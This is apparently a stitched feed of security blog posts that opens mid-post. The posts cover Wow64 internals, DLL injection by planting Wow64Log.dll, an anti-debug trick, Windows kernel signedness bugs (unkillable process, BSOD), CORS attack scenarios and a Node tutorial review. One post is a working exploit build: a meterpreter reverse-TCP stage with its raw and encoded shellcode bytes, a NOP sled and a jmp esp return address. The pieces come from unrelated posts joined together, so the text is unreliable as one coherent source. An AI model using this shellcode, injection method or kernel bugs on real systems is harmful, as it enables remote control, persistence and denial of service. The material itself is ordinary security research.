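The stack-space calculation can be approximated as below. This sketch assumes the standard Microsoft x64 layout (four 8-byte shadow slots for the register arguments, one 8-byte slot per extra argument, 16-byte alignment); the actual "Call64" implementation may compute it differently, and both function names are hypothetical.

```c
#include <stddef.h>

#define REGISTER_ARGS 4u   /* RCX, RDX, R8, R9 */
#define SLOT_SIZE     8u   /* every argument occupies one 8-byte slot */

/* Number of arguments that do not fit in registers and go on the stack. */
size_t stack_arg_count(size_t nargs)
{
    return nargs > REGISTER_ARGS ? nargs - REGISTER_ARGS : 0;
}

/* Bytes to reserve: shadow space for the four register arguments plus
   one slot per extra argument, rounded up to a multiple of 16. */
size_t stack_bytes_for_call(size_t nargs)
{
    size_t slots = REGISTER_ARGS + stack_arg_count(nargs);
    size_t bytes = slots * SLOT_SIZE;
    return (bytes + 15u) & ~(size_t)15u;
}
```

Under these assumptions a call with up to four arguments needs 32 bytes, while a six-argument call needs 48.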

Using the value of the 64-bit mode Code Segment selector, the function makes a Far Call to a 64-bit shellcode responsible for issuing the system call.


Suppose that we want to call the "ZwClose" function using the "Call64" function. What we should do is allocate two LARGE_INTEGER structures, one to hold the value of the "Handle" parameter and the other to receive the return value (RAX). It looks like below.

Another example is the "ProcessConsoleHostProcess" class of the "ZwSetInformationProcess" function. If we trace into this call, we will find that the Wow64 emulation layer implemented in Wow64.dll prevents Wow64 processes from making such a call, thus preventing them from changing their console host processes. See the implementation of the "wow64!whNtSetInformationProcess" function.

The sole solution to this is to directly make the system call without passing through the Wow64 emulation layer. The call using the "Call64" function is like below.


N.B. Bear in mind that some system calls expect pointer arguments to be 8-byte aligned, which is why we should allocate them using e.g. the "_aligned_malloc" function.


Source code and examples can be found here. The function has also been implemented in a Dynamic Link Library, you can find it and its header and .lib files here.

GitHub project from here.

Any comments, ideas, or bug reports are more than welcome.

You can follow me on Twitter @waleedassar

A Real Random VirtualAlloc

In this post I will discuss one disadvantage of using the "VirtualAlloc" function to allocate memory and suggest a trick to work around it.

If you have ever used the "VirtualAlloc" function to allocate memory, you must have noticed that the addresses returned are almost the same across instances of the same process. This is due to the "ZwAllocateVirtualMemory" function doing nothing to ensure the randomness of the base address returned, at least in Windows 7.

N.B. VirtualAlloc is just a wrapper around the "VirtualAllocEx" function, which is a wrapper around the ntdll "ZwAllocateVirtualMemory" function.

To test that, we will create a small application that does almost nothing but call the "ZwAllocateVirtualMemory" function and print the base address at which memory has been allocated.
The source code looks like below.

N.B. Even though ASLR has nothing to do with randomizing the base address of memory returned by ZwAllocateVirtualMemory, we set the "IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE" bit field for testing purposes.

Compile the above source code and run the application several times. See image below.

As you can see in the image above, the base address is the same (0x30000) across all instances of the process and this poses a security issue.

It seems that Microsoft has taken care of this issue when allocating stack memory for threads. In later versions of Windows, e.g. Windows 7, the "RtlCreateUserStack" function, which is responsible for reserving and committing thread stack memory, calls the "NtSetInformationProcess" function with a new information class to reserve the stack memory at a random address. The new process information class is ProcessThreadStackAllocation 0x29.

Now let's see how this new information class reserves memory.

Looking at the disassembly we can see that the function checks the "StackRandomizationDisabled" flag of the "_EPROCESS" structure. We can also see the function trying to randomize some variable by using the "SystemTime" field of the "SharedUserData" page, and the "RDTSC" instruction.

The function then calls the "MiScanUserAddressSpace" and "ZwAllocateVirtualMemory" functions to reserve memory at a random base address.


Now let's test the "ZwSetInformationProcess" function and see if the addresses returned are really random. We compile the code in the image below and run it.
N.B. Setting the "IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE" bit field is necessary for the "StackRandomizationDisabled" bit flag of the "_EPROCESS" structure to be unset.



As you can see in the two images above, each time we ran the application we got a random address for the allocated memory.


Conclusion:
Using the "ProcessThreadStackAllocation" class of the "ZwSetInformationProcess" function, we can obtain a random address for the memory we allocate, which can be considered a security enhancement.

Code and examples for this post can be found here.

You can follow me on Twitter @waleedassar

Wow64Log

In this post I will discuss an interesting functionality that I discovered while reversing Wow64.dll, specifically the "wow64!ProcessInit" function. Let's take the function into disassembly and see what it looks like.

The first thing the function does is open a registry key by calling the "ZwOpenKey" function with the "ObjectAttributes" parameter having the "ObjectName" member set to "REGISTRY\MACHINE\SOFTWARE\Microsoft\WOW64". So our first conclusion here is that the function tries to open the registry key "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wow64" to retrieve specific information that may affect the Wow64 process throughout its lifetime. Usually, the key does not exist, at least on my machine (Windows 7 SP1 64-bit).


Next, if the key was successfully opened, the "Wow64GetWow64ImageOption" function is then called with the first parameter set to the opened key handle, the second parameter pointing at the wide string "Wow64ExecuteFlags", the third parameter set to 0x4 (REG_DWORD), the fourth parameter pointing at the variable that will receive the returned value, and the fifth parameter set to 0x4 (output size).

The "Wow64GetWow64ImageOption" function opens the IFEO registry key and queries the registry value whose name is the string pointed to by the second parameter and on error, it queries the same registry value under the registry key whose handle was given in the first parameter.

The extracted flags are then used to initialize three Wow64 global variables, Wow64!Wow64CommittedStackSize, Wow64!Wow64MaximumStackSize, and Wow64InfoPtr.


Whether the registry key was successfully opened or not and whether the "Wow64ExecuteFlags" value was successfully extracted or not, the "ProcessInit" function then directly jumps to the code you see in the image below.


As you can see it is trying to load a library called "Wow64Log.dll" residing in the "System32" directory by calling the ntdll "LdrLoadDll" function. Usually, this module does not exist.

N.B. Since this code is x64, the library Wow64Log.dll must be 64-bit.

Then comes some code that tries to resolve certain function addresses from Wow64Log.Dll by calling the "LdrGetProcedureAddress" function.

N.B. The kernel32 "GetProcAddress" function is just a wrapper around the ntdll "LdrGetProcedureAddress" function.

The code we see in the image above tries to resolve the addresses of the "Wow64LogInitialize", "Wow64LogSystemService", "Wow64LogMessageArgList", and "Wow64LogTerminate" functions from Wow64Log.dll. If any of these addresses cannot be resolved, the function fails and Wow64Log.dll is unloaded from the address space by calling the ntdll "LdrUnloadDll" function.

Assuming Wow64Log.dll was found in NtSystemRoot\\System32 and the above mentioned functions were found to be exported from it, we will have the global wow64.dll function pointers, "pfnWow64LogInitialize", "pfnWow64LogSystemService", "pfnWow64LogMessageArgList", and "pfnWow64LogTerminate" holding the address of the "Wow64LogInitialize", "Wow64LogSystemService", "Wow64LogMessageArgList", and "Wow64LogTerminate" functions respectively. The "Wow64LogInitialize" function will then be immediately called.
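
The all-or-nothing export check can be modelled as follows. This is a portable sketch, not the Wow64.dll code: the list of names comes from the text above, while the function name and the idea of passing the DLL's export names as a string array are assumptions made so the snippet needs no Windows headers.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* The four exports Wow64.dll expects, as named in the post. */
static const char *const kRequiredExports[4] = {
    "Wow64LogInitialize",
    "Wow64LogSystemService",
    "Wow64LogMessageArgList",
    "Wow64LogTerminate"
};

/* exports/count: names exported by a candidate Wow64Log.dll.
   Returns true only if every required export is present; otherwise the
   loader would unload the DLL again. */
bool has_all_wow64log_exports(const char *const *exports, size_t count)
{
    for (size_t i = 0; i < 4; i++) {
        bool found = false;
        for (size_t j = 0; j < count && !found; j++)
            found = strcmp(exports[j], kRequiredExports[i]) == 0;
        if (!found)
            return false;
    }
    return true;
}
```

A DLL that exports only some of the four names is rejected, so a working Wow64Log.dll has to provide all of them.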

The "Wow64LogSystemService" function will be called every time the "Wow64!Wow64SystemServiceEx" function is called i.e. called with every system call being issued. This can be used for system call logging.

The "Wow64LogMessageArgList" function is called by the "Wow64!Wow64LogPrint" function to log certain events, more likely errors.

The "Wow64LogTerminate" function is called upon process termination by the "Wow64!whNtTerminateProcess" function.


The mechanism described above can be used as a simple method for injecting 64-bit DLLs into Wow64 (32-bit) processes by dropping Wow64Log.dll into System32.

Here is a simple Wow64Log.dll that I wrote as a demo.


You can follow me on Twitter @waleedassar

Wow64-Specific Anti-Debug Trick

In this post I will show you an anti-debug trick that I have recently found. The trick is specific to Wow64 processes. It relies on the fact that 32-bit debuggers e.g. OllyDbg, IDA Pro Debugger, and WinDbg_x86 don't receive debug events for certain exceptions originating from 64-bit code. One example of these exceptions is EXCEPTION_BREAKPOINT 0x80000003.

N.B. In a Wow64 process in Windows 7, its 32-bit code is executing in CS=0x23, while its 64-bit code is executing in CS=0x33.

Let's take for example the ntdll "DbgPrompt" function in Windows 7 64-bit. I chose DbgPrompt for two reasons:
1) Calls to it end up with executing the INT 0x2D instruction, which raises an EXCEPTION_BREAKPOINT.
2) The 32-bit version of it (in 32-bit version of ntdll.dll) calls the 64-bit version of it (in 64-bit version of ntdll.dll).

N.B. The ntdll "DbgPrompt" function wraps up calls to the non-exported "DebugPrompt" function.

So, now if we call the "DbgPrompt" function from within our 32-bit code, we know that the call will end up with an EXCEPTION_BREAKPOINT raised from 64-bit mode.

The interesting thing here is that if you call the function without a debugger, the exception will be raised and its exception handler will be called. On the other hand, if a debugger is present, no exception is raised and the instruction following INT 2D will be executed.

Given the above knowledge, I wrote a simple demo for this Wow64-specific anti-debug trick. You can download the demo from here and its source code from here.







To bypass this trick, you have to use a 64-bit debugger where the exception will be raised and seen by the debugger.

Any comments or ideas are very welcome.

You can follow me on Twitter @waleedassar

Kernel Bug #0 ThreadIoPriority

This post is the first in a series of posts that will discuss several bugs that I have found in the Windows kernel. This post is about a bug found in the kernel of Windows 7 SP1 (64-bit).

Description:
With the "ThreadInformationClass" parameter set to ThreadIoPriority 0x16, passing certain signed values e.g. 0xFF3FFF3C or 0xFF3FFFFC in the variable pointed to by the "ThreadInformation" parameter to the ntdll "ZwSetInformationThread" function can be abused to arbitrarily set certain bit flags of the corresponding "_ETHREAD" structure e.g. ThreadIoPriority:3, ThreadPagePriority:3, RundownFail:1, or NeedsWorkingSetAging:1.

Bug Type:
This is due to a signedness error in the "nt!NtSetInformationThread" function.
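
To illustrate how a signedness error can let such values slip past a privilege check, here is a generic sketch. It is not the decompiled kernel code: the comparison shown is an assumed shape of the check, the function names are hypothetical, and IO_PRIORITY_HIGH uses the documented value of IoPriorityHigh (3).

```c
#include <stdbool.h>
#include <stdint.h>

#define IO_PRIORITY_HIGH 3   /* IoPriorityHigh in the IO_PRIORITY_HINT enumeration */

/* Buggy shape (assumed): the caller-supplied value is compared as a signed
   integer, so values with the top bit set look negative and skip the check.
   The cast wraps to a negative number on mainstream two's-complement compilers. */
bool needs_privilege_signed(uint32_t raw)
{
    return (int32_t)raw >= IO_PRIORITY_HIGH;
}

/* Fixed shape: the same comparison done on the unsigned value. */
bool needs_privilege_unsigned(uint32_t raw)
{
    return raw >= (uint32_t)IO_PRIORITY_HIGH;
}
```

With the signed comparison, 0xFF3FFF3C and 0xFF3FFFFC are treated as negative numbers and never reach the privilege check, whereas the unsigned comparison flags both.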

32-Bit kernel:
64-bit kernel:


Impact:
1) The signed value leads to bypassing the check for the "SeIncreaseBasePriorityPrivilege" privilege that is required to set the thread's IO priority to HIGH.

2) An unprivileged thread can use certain calculated signed values to escalate its IO priority and memory priority to maximum values, e.g. raise IO priority to CRITICAL or page priority to 7.

3) Also, certain bit flags of the corresponding "_ETHREAD" structure can be set e.g. RundownFail and NeedsWorkingSetAging.


POC:
https://www.dropbox.com/s/x7zzx5r62h0k4uz/PriorityCheckBypass.exe

Code:
http://pastebin.com/TanNzkn9

Status:
Reported to the vendor and rejected for not being a security issue.

Any comments or ideas are very welcome. You can also follow me on Twitter @waleedassar

Kernel Bug #1 ProcessIoPriority

In this post I will show you the second kernel bug that I found in the kernel of Windows 7 SP1 (64-bit). This one is in the "nt!NtSetInformationProcess" function.

Description:
With the "ProcessInformationClass" parameter set to ProcessIoPriority 0x21, passing certain signed values e.g. 0xFFFFFFFF or 0x8000F129 in the variable pointed to by the "ProcessInformation" parameter to the ntdll "ZwSetInformationProcess" function can be abused to arbitrarily set certain bit flags of the corresponding "_EPROCESS" structure e.g. DefaultIoPriority: Pos 27, ProcessSelfDelete : Pos 30, or SetTimerResolutionLink: Pos 31.

Bug Type:
This is due to a signedness error in the "nt!NtSetInformationProcess" function.


32-Bit kernel:


64-bit kernel:

Impact:
1) The signed value leads to bypassing the check for the "SeIncreaseBasePriorityPrivilege" privilege that is required to set the process's IO priority to HIGH.


2) The signed value leads to bypassing the check for disallowed values for the process's IO priority e.g. the bug can be abused to set the process's IO priority to CRITICAL.

3) Setting the "ProcessSelfDelete" flag, which makes the target process non-killable by conventional methods.

4) Setting the "SetTimerResolutionLink" flag, which causes a BSOD (bug check code 0x3B) when the process is terminated, due to a null pointer dereference bug.

POC:

Non-Killable Process

BSOD

Code:
http://pastebin.com/QejGQXib

Status:
Reported to the vendor.

Any comments or ideas are very welcome. You can also follow me on Twitter @waleedassar

Stack Adjustment by hand

When you are developing an exploit and you have very limited space for your payload you might need to adjust the stack to be able to use staged exploits. The problem, in case of a multi-stage payload, is that when the first stage that you send in your exploit payload starts to download the second stage, the stack pointer (ESP) might point to a place which is not far enough from the first stage in the memory; hence, the second stage might corrupt the code that you are executing. Stack adjustment is a technique that tries to solve this problem by setting the ESP to create more space for the second stage.

There is an easy solution for that which is really straightforward in metasploit. In your exploit you can set the ‘StackAdjustment’ attribute of the payload. Our simple example will be the ‘attftp_long_filename’ exploit with the ‘windows/meterpreter/reverse_nonx_tcp’ payload. As you can see in [MSF]/msf3/modules/exploits/windows/tftp/attftp_long_filename.rb, it is set to -3500. That will subtract 3500 from the ESP just before executing the payload to make enough space for the second stage. In my case the question was how to do the same without metasploit.

It is actually not that difficult but I wanted to write about it just for the record. As a PoC I implemented the same exploit in python using the same payload, but I will focus here on creating the payload. Our goal will be to create a payload with the following structure:

NOPsled + StackAdjustment + shellcode

Let’s start from the end.

Shellcode

I used the ‘msfpayload’ to generate the first stage of the payload and save it in a file in raw format. I intentionally didn’t encode it at the beginning because I wanted to encode it together with the StackAdjustment, otherwise it wouldn’t fit in the available space. So first let’s generate the payload:

root@bt:/tmp# msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=192.168.56.102 LPORT=7777 R > payload
root@bt:/tmp# hexdump payload
0000000 6afc 47eb f9e8 ffff 60ff db31 7d8b 8b3c
0000010 3d7c 0178 8bef 2057 ea01 348b 019a 31ee
0000020 99c0 c1ac 0dca c201 c084 f675 6643 ca39
0000030 e375 8b4b 244f e901 8b66 591c 4f8b 011c
0000040 03e9 992c 6c89 1c24 ff61 31e0 64db 438b
0000050 8b30 0c40 708b ad1c 688b 5e08 5366 6866
0000060 3233 7768 3273 545f b966 6072 d6ff 5395
0000070 5353 4353 4353 8953 66e7 ef81 0208 5357
0000080 b966 dfe7 d6ff b966 6fa8 d6ff 6897 a8c0
0000090 6638 6866 611e 5366 e389 106a 5753 b966
00000a0 0557 d6ff b450 500c 5753 6653 c0b9 ff38
00000b0 00e6                                  
00000b1

StackAdjustment

Then let’s see how to do the StackAdjustment. We will subtract 3500 (0xDAC) from the ESP, which will make enough space for the second stage payload. To do that, the ‘sub esp, 0xDAC’ instruction has to be executed on the target. We can find out the opcode with the nasm_shell.rb tool of metasploit:

root@bt:/opt/metasploit/msf3# ./tools/nasm_shell.rb 
nasm > sub esp, 0xDAC
00000000  81ECAC0D0000      sub esp,0xdac 
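
If nasm_shell.rb is not at hand, the same six bytes can be produced by hand. The following is a minimal Python sketch; the helper name sub_esp_imm32 is made up for illustration. It relies on the x86 encoding of ‘sub r/m32, imm32’ (opcode 0x81 with ModRM byte 0xEC for ESP) followed by the 32-bit immediate in little-endian order.

```python
import struct


def sub_esp_imm32(amount):
    """Encode `sub esp, imm32`: opcode 0x81, ModRM 0xEC (SUB, ESP), little-endian imm32."""
    return b"\x81\xec" + struct.pack("<I", amount)


stack_adj = sub_esp_imm32(3500)           # 3500 == 0xDAC
print(stack_adj.hex())                    # same bytes as the nasm_shell output above
print("null bytes:", stack_adj.count(b"\x00"))
```

The two null bytes in the immediate are the reason the instruction has to go through the encoder together with the payload. Writing stack_adj to a file in binary mode gives a raw file that can be fed to msfencode.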

The happy marriage with encoding

We need to put this opcode before the msf payload, and of course it has to be encoded because it contains 0x00 bytes. To do this I just concatenated the opcode (saved as raw bytes in the file stack_adj) and the payload, and piped the result into msfencode:

root@bt:/tmp# cat stack_adj payload | msfencode -b '\x00\xff' -t ruby
[*] x86/shikata_ga_nai succeeded with size 210 (iteration=1)

buf =
"\xbe\x15\x4a\xd1\x8c\xda\xde\xd9\x74\x24\xf4\x5f\x31\xc9" +
"\xb1\x2e\x83\xc7\x04\x31\x77\x11\x03\x77\x11\xe2\xe0\xcb" +
"\x3d\x20\x07\xcc\xbd\xc5\x7d\x27\xfa\xdd\x78\x48\xfa\xe1" +
"\x1a\x86\xde\x95\xa7\xd4\x6b\xd5\x6a\x5d\x6d\xc9\x1f\xca" +
"\x4d\x14\xf5\x7e\xb9\x8c\x08\x6f\xf3\x70\x93\xc3\x35\xba" +
"\xae\x1a\x74\xbf\x70\x69\x8e\x83\x16\xab\xa4\x71\x35\x80" +
"\xb3\x35\x9d\x16\x2d\xaf\x56\x04\xf4\xbb\x27\x29\x07\x55" +
"\xb4\x7d\x9e\x2c\xd6\x59\xbc\x4f\xd9\x42\x8d\x54\x41\x08" +
"\xad\x5a\x02\x4e\x3e\x10\x64\x53\x93\xad\xec\x63\xb5\xd7" +
"\xbf\x15\x21\x2b\x0d\xb2\xc6\x38\x43\x1d\x7d\xd9\x1a\xd3" +
"\x1d\xda\x8a\x81\x8d\x77\x61\xf9\x72\x2b\xc6\xae\xfd\x2c" +
"\xae\xd1\x11\xba\x2c\x85\xbe\xdd\x89\xce\x9e\xdd\x3f\x76" +
"\x98\x8a\xd0\x88\x0c\x5d\x46\xb7\x19\x5a\xf0\x51\x32\x85" +
"\x9d\xfb\x91\x30\xbe\x6e\x06\x10\x17\x09\x9f\xc1\x92\x2a" +
"\x09\xbd\x28\xd8\xe6\x6d\x07\xb2\x60\x2b\x67\x0c\x92\xad"

It was important to encode them together, otherwise the result would not fit in the 223-byte space available in the exploit.

NOPsled

The NOPsled can be easily created with metasploit. Since the encoded shellcode is 210 bytes and we need to fill 223 bytes, we need to generate a 13-byte NOPsled:

msf  > use nop/x86/opty2
msf  nop(opty2) > generate -h
Usage: generate [options] length

Generates a NOP sled of a given length.

OPTIONS:

    -b <opt>  The list of characters to avoid: '\x00\xff'
    -h        Help banner.
    -s <opt>  The comma separated list of registers to save.
    -t <opt>  The output type: ruby, perl, c, or raw.

msf  nop(opty2) > generate -b '\x00\xff' 13
buf =
"\x48\x4f\x2d\x25\xbb\x66\xba\x3d\x47\x41\x2f\xd6\xfd"

Putting everything together

In my exploit, I simply concatenated everything together:

nopsled = "\x48\x4f\x2d\x25\xbb\x66\xba\x3d\x47\x41\x2f\xd6\xfd"
shellcode = nopsled
shellcode = shellcode + buf
shellcode = shellcode + "\x53\x93\x42\x7e" #jmp esp address
shellcode = shellcode + "\x83\xc4\x28\xc3" # add esp \x28; retn
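
The same assembly can be written with explicit length checks, which makes the 13 + 210 = 223 arithmetic visible. This is only a sketch in Python 3: build_payload is a hypothetical helper, and the 210 bytes of "A" are a stand-in for the encoded buffer shown earlier, not the real shellcode.

```python
import struct

SPACE = 223  # size of the space the post says is available for sled + shellcode


def build_payload(nopsled, encoded, jmp_esp, trailer, space=SPACE):
    """Concatenate sled, encoded stage, return address and trailing instructions."""
    if len(nopsled) + len(encoded) != space:
        raise ValueError("sled + shellcode must be exactly %d bytes" % space)
    # The return address is stored little-endian, as in the snippet above.
    return nopsled + encoded + struct.pack("<I", jmp_esp) + trailer


nopsled = bytes.fromhex("484f2d25bb66ba3d47412fd6fd")  # the 13-byte sled generated above
encoded = b"A" * 210                                    # stand-in for the 210-byte encoded buf
trailer = b"\x83\xc4\x28\xc3"                           # add esp, 0x28; ret
payload = build_payload(nopsled, encoded, 0x7E429353, trailer)
print(len(payload))
```

Packing the address with struct avoids typing the reversed bytes by hand, and the length check fails loudly if a re-encoded payload changes size.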

Summary

The important takeaway here is how to adjust your stack manually if for some reason you can’t use metasploit. It is not difficult; you just need to get your hands a bit dirty with bytes and hex.

CORS: Attacker Model

I am preparing myself for the Hacktivity conference in Budapest, where I am gonna talk about the security of the Cross-Origin Resource Sharing (CORS). As part of the preparation I will summarise my thoughts in a couple of blog posts.

To start off with I will describe the potential attackers who could try to use CORS in their attacks and I will build an attacker model.

First let’s look at the architecture where CORS is relevant.

CORS: attack environment

It can be seen in the picture that the attacker has control of at least one server. Of course this server could be in the internal network, but placing it outside makes the model more general. The target can be either in the intranet or on the Internet, which brings us to the first differentiation point: the attacker’s knowledge about the internal network.

1) Knowledge

Internal attacker

Here the Internal attacker means that he has knowledge about the internal network and services, but it doesn’t mean necessarily that he is in the internal network. A good example is an ex-employee, who knows how to interact with the internal service and has great chances to do social engineering, however, he has no access to the internal network anymore.

External attacker

The attacker has no knowledge about the internal network. In this case he can either attack services on the Internet, to which he has access, or craft attacks that map the internal network in order to find well-known software (e.g., an open source project used by the company), which he can then analyse off-line.

2) Location

Although the attacker could be local, he would then have better options than using CORS, so I generally consider a remote attacker. As shown in the architecture, the attacker has control over at least one server on the Internet. This server can be his own, in which case he needs to trick the user into visiting it, or it can be a compromised server, which he could use to inject his own code, for instance through an XSS. There are enough vulnerable servers on the Internet, so this is a good option as well.

3) Goal

The goal of the attacker is either to steal information from the target servers, to which he doesn’t have access, or manipulate these applications in a way that can help him in further attacks. When attacking a service on the Internet his goal might be to use the target user’s authenticated session to steal data. In case of the internal target the most important goal is to get access to the target services at all.

4) Summary

To finish the analysis, using the attributes described above, a potential attacker could be, for example, the following:

  • Well informed about the target service.
  • Remote attacker.
  • Goal: access protected content or services.

CORS: Attack scenarios

I was preparing myself for the Hacktivity conference in Budapest, where I talked about the security of the Cross-Origin Resource Sharing (CORS). As part of the preparation I summarised my thoughts in a couple of blog posts. This is one of them.

As a follow up of my previous post, I would like to continue with the short analysis of the threats and attack scenarios which could exploit CORS.

There are a few things to consider here. First, CORS is not broken. It is just a feature that can help already existing attacks exploit other vulnerabilities. From a penetration tester’s point of view CORS is a tool rather than a vulnerability. Second, the most important property of CORS is that it gives you a kind of pass through the same-origin policy, with a handful of limitations.

First let’s see the possible attacks from three different perspectives:

  • Goal of the attack
  • Target’s location
  • Type of attack

1) Goal of the attack

To start off with, it is worth understanding what kind of goals an attacker can have in mind.

Exploit Cross-Site Request Forgery

The most critical problem that an attacker can exploit with CORS is Cross-Site Request Forgery (CSRF). The main reason is that with CORS the attacker can send a complex set of requests to the server, even with session cookies. For instance, before CORS it was a bit difficult to order a product via a CSRF attack if the order process was multistage. In that case the attacker had to submit multiple forms to send the correct requests; with CORS, however, it is possible to implement the whole attack in JavaScript, and when the user loads the attacker’s malicious website the JavaScript can immediately start sending requests to the target.

Another important aspect is the file upload CSRF. I have already written about that here, so I won’t go into details, however, the point is that before CORS it was not possible to upload files through CSRF because of the ‘filename’ attribute in the request. But now it is possible because JavaScript can be used to build the request.

Interact with the internal network

If the user loads the attacker’s website in the company network, that essentially means that the attacker can execute code in the internal network. Of course some pretty strong limitations apply, which I will describe in the ‘Limitations’ part. So in this case the attacker can use CORS to explore the network, find well-known services, do simple scanning, etc., or simply attack a known internal service to which he has no access.

2) Target’s location

Another important aspect of attacks is the location of the target. Here ‘target’ means the target service: not the user who loads the malicious content, but the service which the attacker wants to attack through CORS.

Attacking services on the Internet

This is pretty straightforward. The attacker wants to attack a service which runs publicly on the Internet, but he wants to access some restricted content, or he wants to act in the name of somebody else. He can set up a malicious page and trick the user into loading it; when the user does, the page can interact with the target service from the user’s browser. An (imaginary) example would be the following: let’s assume that Facebook has a CSRF vulnerability in the share functionality. When the innocent user opens the malicious website, the JavaScript on it sends a request to Facebook to share something (which serves the attacker’s goal) on the user’s wall. Because of CORS the JavaScript can do that, and with the ‘withCredentials’ XMLHttpRequest attribute the script can use the authenticated session of the user.

Attacking internal services

In the second case the attacker uses CORS and the user’s browser as a pivot point to get access to the internal (company) network. When the user loads the attacker’s malicious page, the JavaScript will be able to access services which are not accessible to the attacker from the Internet.

3) Direct vs Indirect

Direct attack against services

I wanted to mention this case because, although it might seem trivial, many people still make this mistake because they misunderstand CORS. The problem is that some people consider CORS some kind of authorization mechanism. This comes from the fact that if you send an XMLHttpRequest and the server rejects your CORS request, the response data will not be available to the JavaScript. What they forget is that the data is still sent to the client, and the browser decides, based on the response’s Access-Control-Allow-* headers, whether to expose it to the JavaScript or not. Unfortunately this solution fails terribly when the client happens to be a script or a netcat running in the terminal. So when I write direct attack, I mean that the attacker connects directly to the service and not through the browser of some other user.
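
To make the point concrete, here is a minimal Python sketch of a direct attack. Everything in it is hypothetical: the handler stands in for a service that "protects" its data only by sending no Access-Control-Allow-Origin header, and the Origin value is invented. A non-browser client reads the body anyway.

```python
import http.server
import threading
import urllib.request


class NoCorsHandler(http.server.BaseHTTPRequestHandler):
    """Hypothetical service that relies on CORS instead of real authorization."""

    def do_GET(self):
        body = b"internal report"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()          # note: no Access-Control-Allow-Origin header
        self.wfile.write(body)

    def log_message(self, *args):
        pass                        # keep the demo quiet


def fetch_without_browser():
    server = http.server.HTTPServer(("127.0.0.1", 0), NoCorsHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        url = "http://127.0.0.1:%d/" % server.server_address[1]
        request = urllib.request.Request(url, headers={"Origin": "http://attacker.example"})
        opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore proxies
        with opener.open(request) as response:
            return response.headers.get("Access-Control-Allow-Origin"), response.read()
    finally:
        server.shutdown()
        server.server_close()


allow_origin, body = fetch_without_browser()
print(allow_origin, body)
```

The script is never told it may read the response and does not care: enforcing CORS is the browser's job, so the service needs its own authentication and authorization.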

Indirect attacks

The indirect attacks are the traditional client side attacks, when the malicious code is injected in a website, that has to be loaded by the user. When the page is loaded the malicious code attacks the target service from the user’s client.

4) Limitations

As mentioned before there are pretty strong limitations when using CORS.

Write only requests

Often, when the service is well configured or not configured at all, the response will not be readable by the JavaScript. For instance, if the HTTP response has no Access-Control-Allow-Origin header, then, although all the data was sent to the client, the JavaScript will not be able to access it. This means that requests can be sent to the server and the requested actions will be executed (hence the write only), but the JavaScript won’t be able to read the responses. This stops the attacker from first requesting a form on the website to read the CSRF protection token and then submitting the form with the token, because the script won’t be able to read the response.

withCredentials vs. Access-Control-Allow-Origin: *

This is an interesting limitation which is actually quite smart. If you send a request with credentials and the server responds with Access-Control-Allow-Origin: *, which allows every origin, then you will not see the response content from JavaScript. The reason is that ‘withCredentials’ cannot be combined with a wildcard that allows all origins. This is the last line of defense against CSRF. If you could read the response, that would break 99% of CSRF protections, because you could first load a page with your credentials, steal the CSRF token, then do a CSRF with the token.
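
The two limitations can be summarised as a small decision function. This is a simplified Python model of the browser-side check, not browser code; the function name and the example origin are invented for illustration.

```python
def response_readable(request_origin, with_credentials, headers):
    """Simplified model: may the page's JavaScript read this cross-origin response?"""
    allow_origin = headers.get("Access-Control-Allow-Origin")
    if allow_origin is None:
        return False                 # the request was still sent: "write only"
    if allow_origin == "*":
        return not with_credentials  # the wildcard never applies to credentialed requests
    if allow_origin != request_origin:
        return False
    if not with_credentials:
        return True
    # Credentialed requests additionally need an explicit opt-in from the server.
    return headers.get("Access-Control-Allow-Credentials") == "true"


ORIGIN = "https://attacker.example"
print(response_readable(ORIGIN, False, {}))
print(response_readable(ORIGIN, True, {"Access-Control-Allow-Origin": "*"}))
print(response_readable(ORIGIN, False, {"Access-Control-Allow-Origin": "*"}))
```

In every case where the function returns False, the request may already have been processed by the server. Only the ability to read the answer is withheld.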

5) Summary

These different perspectives are a little redundant, but all the different attack scenarios can be built from combinations of them.

Since this is only my quick analysis, if you have other ideas on the topic let me know.

Review: Build a Network Application with Node video tutorial

I have been asked to review Joe Stanco’s Build a Network Application with Node video tutorial. So let’s see.

Node

Format

So first of all let’s see what you get. This is a Node.js video tutorial. To get a glimpse you can watch the example chapter on Youtube, here. From the format point of view, you get a web UI to watch the videos, which you can do either on-line or off-line. For instance I was watching it on the train to Vienna, so it works very well off-line. The tutorial is organized into 1-3 minute videos. This can be useful if you want to revisit a topic later, however, it is a bit annoying when you watch it for the first time. The only problem is that the next video is not loaded automatically, hence you always have to minimise the video, click the next chapter and then click play. This is still ok, but it could be better.

Content

I won’t copy-paste the TOC, you can find it here. I think the covered topics are pretty good if you are a beginner in Node. The videos are also quite good: very few slides, mostly code, terminal, and browser, which fits my taste :). However, the code is not written live but copy-pasted, which made it a bit more difficult for me to follow, because I often had to pause the video to have time to read through the inserted code. That is at least better than a video that is too slow and makes you wait. Another annoying thing in the UI is that you cannot pause the video with the spacebar (which I think should be the default for every media player).

Regarding the topics, as a rule of thumb, for every topic mentioned the course explains how to install and configure it, and shows one example. If you already have that much experience with a topic, you probably won’t learn anything new about it.

The narrator (to be honest, I don’t know whether it is Joe Stanco or not) speaks clearly. The script of the course is clearly well prepared, which has advantages and disadvantages. The good part is that it is really clear and exact; the bad part is that it lacks fun and humour, and most things are defined exactly once. This means that if you don’t understand something from one sentence, you won’t get another chance. But this also makes the course shorter and not redundant.

Although the course doesn’t include exercises, the code of the examples is available, so you can try them out and play with them.

Security

Since I work in security I must take that into consideration as well. The course doesn’t talk about security at all, which makes me a bit sad. Of course you could say that this is not an advanced course and IT security is more complicated than that; however, in my opinion security should be discussed at every level, at least so that the reader is aware of the threats and knows that he has to deal with security. I think most of the people who take this tutorial will start to write applications without taking any advanced course where security would be discussed; thus, they will probably be writing insecure applications until they get hacked or somebody tells them to take security seriously. That is why I think that no introductory course should exist without mentioning security.

Pros

  • Topics are good.
  • Example code is available.
  • Faster way to get to know Node than reading a book.
  • Script is well written.
  • More code, less slides.
  • Explanations are mostly clear.

Cons

  • No automatic jump to next video.
  • No pause on spacebar.
  • Everything explained only once.
  • No exercises.
  • SECURITY IS NOT DISCUSSED.

Summary

